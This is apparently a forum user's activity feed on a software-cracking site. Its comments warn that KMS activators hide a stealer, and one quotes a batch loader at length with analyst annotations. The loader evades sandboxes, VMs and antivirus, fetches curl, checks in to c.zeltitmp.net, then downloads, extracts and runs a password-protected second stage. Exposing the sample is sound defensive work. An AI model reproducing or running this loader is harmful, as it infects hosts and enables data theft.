Activity

  • 29 February 2024
  • maorosh ·
    commented in GoodSync 12.7.8 Pro | Enterprise | Server | GoodSync2Go Portable | RePack by elchupacabra
    12.5.6
    new patch is needed
  • 11 January 2024
  • maorosh ·
    commented in KMS Matrix 6.6 by GodMatrix
    It's similar to Windows Activator by Goddy [v4.8]
    same group of shiti people
  • maorosh ·
    commented in KMS Matrix 6.6 by GodMatrix
    virus ... 
    Here is some bad code,
    found inside the source code:

    ZZZZZZZZZZZZ

    rem Analyst note: entry label of the routine the poster flagged as malicious.
    rem The guillemets and low/high typographic quotes in this listing are presumably
    rem the forum's rendering of straight double quotes - confirm against the original file.
    :KMSReActivation

    rem Record the process architecture. PROCESSOR_ARCHITEW6432 is only defined for a
    rem 32-bit process on 64-bit Windows, in which case osB is forced to AMD64.
    set «osB=%PROCESSOR_ARCHITECTURE%»

    if defined PROCESSOR_ARCHITEW6432 set «osB=AMD64»

    rem On x86: no extra reg switch and pf is "Program Files".
    rem Otherwise: pf is "Program Files (x86)" and bits is /reg:32.
    rem bits is passed to the reg commands further down; pf is the 7-Zip lookup path.
    if "%osB%"==«x86» (

    set «bits=»

    set «pf=%SystemDrive%\Program Files»

    ) else (

    set «pf=%SystemDrive%\Program Files (x86)»

    set «bits=/reg:32»

    )

    rem Date gate: the routine quits on three specific dates read from a config file.
    rem yn is the fixed two-digit year suffix used when building those dates.
    set yn=23

    rem Import Day, Month and Year from WMI as environment variables.
    for /f %%a in ('wmic path win32_LocalTime Get Day^,Month^,Year /value') do >nul set "%%a"

    rem Zero-pad Month and Year to two characters. Day is not padded.
    set Month=00%Month%

    set Month=%Month:~-2%

    set Year=00%Year%

    set Year=%Year:~-2%

    set dt=%Day%%Month%%Year%

    rem Each line of the file cnf in the temp directory is handed to "set", so the file
    rem defines variables for this script. It is presumably written by an earlier
    rem stage that is not part of this excerpt - verify on an affected host.
    set «cnfv=%tmp%\cnf»

    for /f «usebackq delims=;» %%i in ("%cnfv%") do set %%~i

    rem Build three day+month+year strings from d1, d2, d3 and m1 (expected from cnf).
    set «dt1v=%d1%%m1%%yn%»

    set «dt2v=%d2%%m1%%yn%»

    set «dt3v=%d3%%m1%%yn%»

    rem Quit without doing anything further if today matches any of the three dates.
    if %dt% equ %dt1v% exit

    if %dt% equ %dt2v% exit

    if %dt% equ %dt3v% exit

    rem Analysis-evasion checks: every test below ends the script when it matches.
    rem Sandbox check: quit if a process named SbieSvc.exe is running
    rem (the name is associated with the Sandboxie service).
    for /f tokens^=1^ delims^=^" %%i in ('tasklist /fi «imagename eq SbieSvc.exe» /fo csv /nh') do set sb=%%~i

    if "%sb%" equ «SbieSvc.exe» exit

    rem Run-once marker: quit if the key HKLM\SOFTWARE\Microsoft\Alu already exists,
    rem otherwise create it. Defenders can treat this key as a host indicator that
    rem the routine has reached this point before.
    reg query «HKLM\SOFTWARE\Microsoft\Alu» /s %bits%

    if %ERRORLEVEL% equ 0 exit

    reg Add «HKLM\SOFTWARE\Microsoft\Alu» /f %bits%

    rem Virtual-machine check: read SystemProductName from two registry locations
    rem and quit when it is KVM, VirtualBox or Virtual Machine.
    for /f «tokens=2*» %%a in (' reg query «HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SystemInformation» /v «SystemProductName» ') do set vm1="%%b"

    for /f «tokens=2*» %%a in (' reg query «HKEY_LOCAL_MACHINE\SYSTEM\HardwareConfig\Current» /v «SystemProductName» ') do set vm2="%%b"

    if %vm1% equ «KVM» exit

    if %vm1% equ «VirtualBox» exit

    if %vm2% equ «Virtual Machine» exit

    rem Security-product checks: quit if ekrn.exe or QHActiveDefense.exe is running.
    rem NOTE(review): these names are associated with ESET and 360 Total Security - confirm.
    for /f tokens^=1^ delims^=^" %%i in ('tasklist /fi «imagename eq ekrn.exe» /fo csv /nh') do set sb=%%~i

    if "%sb%" equ «ekrn.exe» exit

    for /f tokens^=1^ delims^=^" %%i in ('tasklist /fi «imagename eq QHActiveDefense.exe» /fo csv /nh') do set sb=%%~i

    if "%sb%" equ «QHActiveDefense.exe» exit

    rem The command name below is split by the variables v70 and v71, which are not
    rem defined in this excerpt. If they expand to nothing the command reads "dir",
    rem i.e. a search for executables under the Kaspersky Lab program folders.
    rem The script quits when either search succeeds.
    d%v70%i%v71%r /S "%SystemDrive%\Program Files\Kaspersky Lab\*.exe"

    if %ERRORLEVEL% equ 0 exit

    d%v70%i%v71%r  /S "%SystemDrive%\Program Files (x86)\Kaspersky Lab\*.exe"

    if %ERRORLEVEL% equ 0 exit

    rem Tool staging: when System32 has no curl.exe, PowerShell downloads one into
    rem System32 from a GitHub repository, then from zelticloud.net as a fallback.
    rem Nothing here verifies the downloaded binary. On hosts that already have
    rem curl.exe in System32 both downloads are skipped.
    rem Detection idea: a curl.exe in System32 that is not the vendor-signed copy,
    rem or PowerShell writing an executable into System32.
    if not exist %windir%\System32\curl.exe powershell "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (new-object net.webclient).DownloadFile('https://github.com/cloud1cybertron/wincurl/raw/main/curl.exe', '%windir%\System32\curl.exe')"

    if not exist %windir%\System32\curl.exe powershell "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (new-object net.webclient).DownloadFile('https://zelticloud.net/cu/curl.exe', '%windir%\System32\curl.exe')"

    rem Give up if curl.exe is still missing after both attempts.
    if not exist %windir%\System32\curl.exe exit

    rem Host profiling and check-in. Re-read the cnf file from the temp directory and
    rem copy its pid and sid values into p1 and s1.
    set «cnfv=%tmp%\cnf»

    for /f «usebackq delims=;» %%i in ("%cnfv%") do set %%~i

    set p1=%pid%

    set s1=%sid%

    rem Look up the host's public IP address and country through ipinfo.io.
    rem The -k switch tells curl to skip TLS certificate verification.
    for /f «tokens=* delims= » %%a in ('curl ipinfo.io/ip -k') do set «ei=%%~a»

    for /f «tokens=* delims= » %%a in ('curl ipinfo.io/country -k') do set «ec=%%~a»

    rem Record which of 7, 8, 8.1, 10 or 11 appears in the OS caption reported by WMI.
    for %%i in (7 8 8.1 10 11) do (wmic os get caption|(>nul findstr /ilc:«Windows %%i»)&&(set es=%%i))

    rem didl is the loop counter for the 8-character random string built at :grmd.
    set didl=8

    setlocal EnableDelayedExpansion EnableExtensions

    rem Request c01.php on c.zeltitmp.net with the fixed user agent c010101 and keep
    rem the response in a variable. Both the host name and the user agent string
    rem are usable as network indicators.
    for /f «tokens=* delims= » %%a in ('curl -k c.zeltitmp.net/c01.php --user-agent «c010101» ') do set «aaajkbkdfkjlgjfdkljhg4df=%%~a»

    set num_t=16

    set «num_set=0123456789abcdef»

    rem Loop: prepend one random hex character to ed per pass until didl reaches 0.
    rem How ed is used is not visible; presumably a per-run identifier - confirm.
    :grmd

    set /a «rnd=%num_t%*%random%/32768»

    set «ed=!num_set:~%rnd%,1!%ed%»

    set /a «didl-=1»

    if %didl% gtr 0 goto grmd

    rem Pick a number from 1 to 100 and map it to a browser-like user agent string.
    rem Only the first entries are shown; the poster cut the listing off at the dots.
    rem NOTE(review): "Windows NT 11.0" is not a token real browsers send, so it may
    rem help when hunting for this traffic - confirm before relying on it.
    set /a rg1=(%random%%%100)+1

    if %rg1% == 1 set «uat=Mozilla/5.0 (Windows NT 10.0; Win64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5377.168 Safari/537.36»

    if %rg1% == 2 set «uat=Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5368.101 Safari/537.36»

    if %rg1% == 3 set «uat=Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5386.123 Safari/537.36»

    if %rg1% == 4 set «uat=Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like .................................

    rem Second-stage retrieval: download m.7z from zeltitmp.net into the temp directory,
    rem with certificate checks off (-k), redirects followed (-L) and the fixed
    rem user agent cnfvp201.
    curl -k -o „%tmp%\m.7z“ -L „zeltitmp.net/pp/m.7z“ --user-agent „cnfvp201“

    rem Unpack the archive into the temp directory with the 7-Zip found under pf,
    rem using a hard-coded password. A password-protected archive keeps the content
    rem opaque to scanners that cannot open it.
    »%pf%\7-zip\7z.exe" x "%tmp%\m.7z" -o"%tmp%" -pconfigvpnG2012885838482012ggg -y

    rem Run the extracted m.bat if it exists. Its content is not part of this listing.
    if exist %tmp%\m.bat powershell %tmp%\m.bat

    rem Clean-up: remove the config file and cc.7z (cc.7z is not referenced elsewhere
    rem in this excerpt). m.7z and m.bat are not deleted here, so they may remain in
    rem the temp directory as forensic artefacts.
    del %tmp%\cnf

    del %tmp%\cc.7z

    exit
  • 27 December 2023
  • maorosh ·
    commented in Windows Activator by Goddy 5.0
    It's a stealer

    `
    :: password configvpnG2012885838482012ggg
    rem Analyst note: the command below downloads m.7z from zeltitmp.net with
    rem certificate checks off (-k), redirects followed (-L) and the fixed user agent
    rem cnfvp201. The line above is the poster's record of the archive password.
    curl -k -o «m.7z» -L «zeltitmp.net/pp/m.7z» --user-agent «cnfvp201»
    rem From m.bat
  • maorosh ·
    commented in Windows Activator by Goddy 5.0
    Ratiborus is great. I don't know why others do such shit 13
  • maorosh ·
    commented in Windows Activator by Goddy 5.0
    drop virus ......
    rem Analyst note: download of m.7z from zeltitmp.net with certificate checks off.
    rem The empty output directory and empty user agent are presumably variable
    rem references lost when the line was pasted - confirm against the original file.
    curl -k -o "\m.7z" -L «zeltitmp.net/pp/m.7z» --user-agent ""

    rem Extraction of the downloaded archive with 7-Zip and a hard-coded password.
    «C:\Program Files (x86)\7-Zip\7z.exe» x "\m.7z" -o"" -pconfigvpnG2012885838482012ggg -y
  • 18 April 2023
  • maorosh ·
    voted for post Office(R)Tool 13.0